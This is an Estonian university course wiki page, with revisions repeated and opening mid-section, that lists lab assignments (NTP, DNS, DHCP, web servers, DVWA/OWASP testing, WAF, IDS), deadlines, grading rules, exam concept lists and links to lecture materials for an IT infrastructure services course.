Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-18T07:48:19Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[ntop]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
Muutke /etc/hosts failis masinanimi

127.0.1.1 ns.sinudomeen ns

Näiteks valisin oma domeeniks mernits.zz

127.0.1.1 ns.mernits.zz ns

startige teenus '''hostname'''
<source lang="bash">
service hostname start
</source>

Korraldus hostname -f peab tagastama FQDN-i
<source lang="bash">
hostname -f
</source>

Seadistage ka võtmetepõhine autentimine [[OpenSSH: võtmetega autentimine]]

[[Image:Infra-a21-2015.png|thumb|Kasutatav võrk]]

==Labor 1 - NTP seadistamine (6p/6%)==
Loe läbi õppematerjal (loengud) ja seadista NTP teenus nii kliendis, kui ka serveris selliselt, et klient küsib aega ainult serverist (ja ka localhostist, mille prioriteet on madal e fudge 10) Server küsib aega EENET NTP serverist ja mõnest muust Eestis asuvast NTP serverist.

Seadistage server selliselt, et ei välisvõrgust ei saa teha järgmisel lingil kirjeldatud rünnet https://www.us-cert.gov/ncas/alerts/TA14-013A

[[NTP Ubuntus]]

==Labor 2 - DNS seadistamine (6p/6%)==

*Mõtle välja endale domeeninimi
*Loo domeeninimele tsoonifail ja seadiste nimeserver
*Luba rekursiivne lahendus oma sisevõrgust
*Loo reevers tsoon
*Loo A kirjed e-posti, nimeserveri jaoks
*Loo CNAME kirjed www, samba ja oma severi jaoks

Näitelahendus [https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit Domain Name Server ehk nimeserveri labor]

Näitelahendus2 [[Nimeserveri labor V.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/dns/DNS_BIND.html Väike abiinfo lisaks loengule]

Kaitsmisel pead oskama luua uut tsooni, lisama kirjeid, oskama kasutada rndc, dig, nslookup vahendeid.

==Labor 3 - DHCP seadistamine (6p/6%)==
* DHCP paigaldamine ja seadistamine (6p)

Seadista labori desktop VM saamaks IP aadressi ja nimeserverit sama labori serveri VM käest.

PS: desktop võrguseadetest eemalda esimeselt liideselt nimelahenduse küsimine (küsitakse DHCP abil ainult IP aadress). Kui seda ei tee, siis lähevad DNS päringud ikkagi esimese, NAT liidese kaudu.

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit DHCP näitelabor]

==Labor 4 - apache (või nginx) veebiserveri seadistamine (6p/6%)==
* Loo kaks virtualhosti nii http, kui ka https (self-signed cert) tarbeks.
** Mõlemad nimied peavad sirvijas töötama (desktop arvutis) nii http, kui ka https abil ja esilehel peab olema selgelt näha kumma virutalhostiga on tegemist. Seega index.html sisse lisa virtualhosti nimi.

* Abimaterjalina võib sobida: Apache2 paigaldamine ja virtualhostide seadistamine [[Virtualhost apache2 näitel]]. Algajale lisamaterjal [[Veebiserveri labor v.2]]

==Labor 5 - mõne veebirakenduse (nt Wordpress) paigaldamine ja turvamine varnishiga (10p/10%)==

Labori eesmärgiks on paigaldada veebirakendus, mõõta selle jõudlust ja seejärel suurendada veebirakenduse jõudlust kasutades puhvermälu. Veebirakenduse ja puhvermälu võib iga tudeng ise valida. Näite teeme WordPress ja WP SuperCace abil. Samas on väga soovitatav valida cache tehnoloogia ise, et erinevad inimesed saaksid võrrelda erinevaid asju.

* Wordpress paigaldamine https://docs.google.com/document/d/1AKVigVudVjxQuCz02i6p4Kv8oO4RD6aJiV9pbPuujZY/edit?pli=1

* Wordpress paigaldamine ja jõudluse testimine (varnish)
[[WordPress turvamine]]

http://wpdevshed.com/top-cache-plugins-wordpress/

[[Varnish]] - vaata http://www.howtoforge.com/putting-varnish-in-front-of-apache-on-ubuntu-debian
[[Apache logide seadistus]]

==Labor 6 - DVWA paigaldamine ja OWASP testimine (10p/10%)==

Paigaldage DVWA: https://wiki.itcollege.ee/index.php/DVWA

Loe läbi OWASP top 10 ja [http://enos.itcollege.ee/~ttanav/VRI/abiks/mysql_tut.php SQL põhitõed]

Mõned videod:

* https://www.youtube.com/watch?v=CDbWvEwBBxo

==Labor 7 - rakenduste tulemüürid (greensql ja mod_security baasil) (10p/10%)==

==Labor 8 - IDS (10p/10%)==

Seadistada IDS/IPS ühele oma valitud serverile ja demonstreeida ühe-kahe reegli toimimist.

Juhend: https://wiki.itcollege.ee/index.php/IDS_Systeemid_-_Labor_1

Abistav materjal: https://wiki.itcollege.ee/index.php/Suricata

==Questid, millede eest saab punkte==

Quest 1 (Läbi ja tehtud) - https://docs.google.com/document/d/1oRt9JLF6lcf_Z-ReHCfbZXnSoc-EOBzGprxvIyhq4qk/edit?usp=sharing

=Esitatud referaadid=
[[IT infrastruktuuri teenused 2013 kevad]]

[[Wordpressi turvalisuse suurendamine]]

=Juurteenuste kursus=
[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused.html Interneti juurteenused]

=Täiendav lugemismaterjal=
[https://zib.wooop.biz/category/asd/ Erinevad juhendmaterjalid Linuxi teenuste jm seadistamiseks. Autor Gert Vaikre A21]

=Vanad loengumaterjalid=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng00%20-%20Sissejuhatav%20loeng.odp Loeng 00 - Sissejuhatav loeng - NB Tähtajad ja nõuded]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng01%20-%20E-post.odp Loeng 01 E-post]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.odp Loeng 03 Failiserver]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Loeng 04 Veebiserver]

[http://goo.gl/6XQ0U WordPress seadistamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Loeng 05 Dokumentatsioon]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng06%20-%20VPN.odp Loeng 06 VPN]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng07%20-%20iptables.odp Loeng 07 Tulemüürid]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng08%20-%20SAN%20-%20NAS%20-%20CAS.odp Loeng 08 SAN NAS CAS]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng09%20-%20Virtualiseerimine.odp Loeng 09 Virtualiseerimine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng10%20-%20DHCP.odp Loeng 10 DHCP]

Category:I375/I803/I853 IT Infrastructure services

2015-05-18T07:42:56Z

Mernits: /* ReferaadiTeemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/juurteenused-ntp.html NTP teenus] (Päevaõppes toimus 02.02.2015)

[https://www.us-cert.gov/ncas/alerts/TA14-013A NTP amplification Attack]

Kodutöö nr 1. Tähtaeg 9.02.2015. DNS loenguks lugeda läbi DNS põhimõisted järgnevatest materjalidest:

Kohustuslik:
http://kuutorvaja.eenet.ee/wiki/DNS_ja_BIND

Soovituslik:
http://kuutorvaja.eenet.ee/wiki/DNS

[http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.odp DNS loeng (OpenDocument)] [http://enos.itcollege.ee/~mernits/infrastruktuur/Interneti%20domeeninimede%20s%c3%bcsteem%20-%20IT%20infra%20loeng.pdf (PDF)]

[http://elab.itcollege.ee:8000/infra/bind/ BIND9 konfiguratsiooni näitefailid]

[https://docs.google.com/document/d/1ZeQpPXdVq1C7RQpxQYR0gBB0OBMYB_0g6aFFxs_-fIA/edit DNS näide]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Infra%20loeng%20DHCP%202013.odp DHCP loeng]

[https://docs.google.com/document/d/1yUEWHldPhIbeVRh3k-zmwEg1OJmIGywMKVZY4XslpDY/edit# DHCP näitelabor]

[https://docs.google.com/document/d/14Cj90aWN4n4MCO_zZlZzu0aHJeIDTPEfQgiDXIuMxF4/edit# DNS uuendamine DHCP abil]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.odp Veebiserveri loeng]

Screencast veebiserveri konfigureerimisest:

http://elab.itcollege.ee:8000/veebiserver/out-1.ogv

http://elab.itcollege.ee:8000/veebiserver/out-2.ogv

http://elab.itcollege.ee:8000/veebiserver/out-3.ogv

Kodutöö nr 2. Tähtaeg 20.aprill.2015. Lugeda läbi [http://owasptop10.googlecode.com/files/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP top 10 2013] 

=Mõisted kontrolltööks ja arvestuseks=

'''Esimese kontrolltöö küsimused:'''

*DNS mõistete kohta leiab infot: http://kuutorvaja.eenet.ee/wiki/DNS
*hostinimi (mis märgid on hostinimes lubatud ja kus?)
*host täisnimi
*domeeni täisnimi
*DNS
*A-kirje
*alias ehk CNAME
*puhverdamine
*dig ja selle kasutamine
*DNS spoofing
*domeen ja domeeninimi
*Authoritative ehk pädev server
*Forwarding ehk edastamine
*FQDN
*Host
*PTR-kirje
*rekursiivne lahendus
*primaarne server
*sekundaarne server
*open resolver
*kuidas nimelahendus töötab, kirjelda näiteks "kui veebisirvijas avatakse leht, siis mis võiks toimuda?"
*selgitage näitekonfi
<pre>
$TTL 600
@ IN SOA planet.zz. root.planet.zz. (
3 ; Serial - Mida see tähendab?
3600 ; Refresh - Mida see tähendab?
8640 ; Retry - Mida see tähendab?
36000 ; Expire - Mida see tähendab?
3600 ) ; Negative Cache TTL - Mida see tähendab?
;

</pre>

'''Teise kontrolltöö küsimused:'''

*virtuaalhost
*http
*Kuidas toimub ssl/tls ühenduse algatamine?
*Mis vahe on sümmeetrilisel ja asümmeetrilisel krüpteerimisel?
*Mis vahe on avalikul võtmel ja sertifikaadil?
*https
*SNI
*IPS
*IDS
*Mis vahe on reflected XSS ja stored XSS rünnetel?
*Mis vahe on SQL injectionil ja blind SQL injectionil?
*Mis on secure cookie? (http://php.net/session.cookie-secure ;session.cookie_secure =)
*Mis tähendab, et küpsised on http_only?
*Kas XSS ründeid saab filtreerida andmebaasikihis, näiteks SQL tulemüüriga?
*Mis on CSRF ja kuidas see toimib?
*Mis on same origin policy?

=Dokumentatsioon=

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng05%20-%20Dokumentatsioon.odp Dokumentatsioonist (loeng)]

[http://enos.itcollege.ee/~mernits/infrastruktuur/Aruannete%20hindamise%20juhend.pdf Hindamismaatriksi näide]

= ReferaadiTeemad 2015 =

[[SQL tulemüürid]] -- Otsida erinevaid SQL tulemüüre ja kirjata nende põhiparameerid

[[sqlmap]]

[[Kippo SSH Honeypot]]

[[p0f]] http://tools.kali.org/information-gathering/p0f

[[hping]] http://www.hping.org/

[[Yersinia]] - http://www.yersinia.net/

[[WPScan]] - http://wpscan.org/

[[Aircrack]]

[[Nikto]]

[[Varnish]] - Artikkel on olemas, kuid vajab kaasajastamist (Artikli valimise korral kirjuta artikli algusesse suurelt: Kaasajastab <Sinu ees- ja perekonnanimi>, 2015, <rühm>

[[DigiNotar]]

[[Ipkungfu Tulemüür]]

=Abimaterjal=
* [http://tools.ietf.org/html/rfc2131 RFC2131]
* [http://kuutorvaja.eenet.ee/wiki/Isc-dhcpd_server Kuutõrvaja DHCP materjal]

Abimaterjal laboriks:
* Maskeraad [[Ufw]]
* DHCP serveri seadistamine [[DHCP]]
* [http://www.debian-administration.org/article/343/Configuring_Dynamic_DNS__DHCP_on_Debian_Stable Dünaamiline DNS kirjete uuendamine DHCP poolt]
* [http://debianclusters.org/index.php/Troubleshooting_DHCP DHCP probleemide lahendamine]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng11%20-%20Monitooring.odp Loeng 11 Monitooring]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng12%20-%20LDAP.odp Loeng 12 LDAP]

=Praktilised tööd=

[https://docs.google.com/spreadsheets/d/1TiErlKTrnW3T_dcjceMyeLr9yCHBDwTmjXDxkAf1hDw/edit?usp=sharing Nimekiri] DNS labori masinate IP vahemikega ning domeeninimedega

==Sissejuhatav praktikum==

Valige endale domeeninimi, näiteks eikkasutaja.zz.

Seadke DNS serverile IP aadress 192.168.56.201
<source lang="bash">
nano /etc/network/interfaces # Avab võrguliideste faili.
# DNS serveri eth1 võrguliidesel tuleb muuta esialgne IP-address 192.168.56.200 uueks IP-addressiks 192.168.56.201
auto eth1
iface eth1 inet static
address 192.168.56.201
netmask 255.255.255.0
</source>

Taaskäivitage võrguliides '''eth1'''
<source lang="bash">
ifdown eth1 && ifup eth1
</source>

Muutke DNS serveril hostinimi ns.sinudomeen.
<source lang="bash">
echo ns > /etc/hostname
</source>
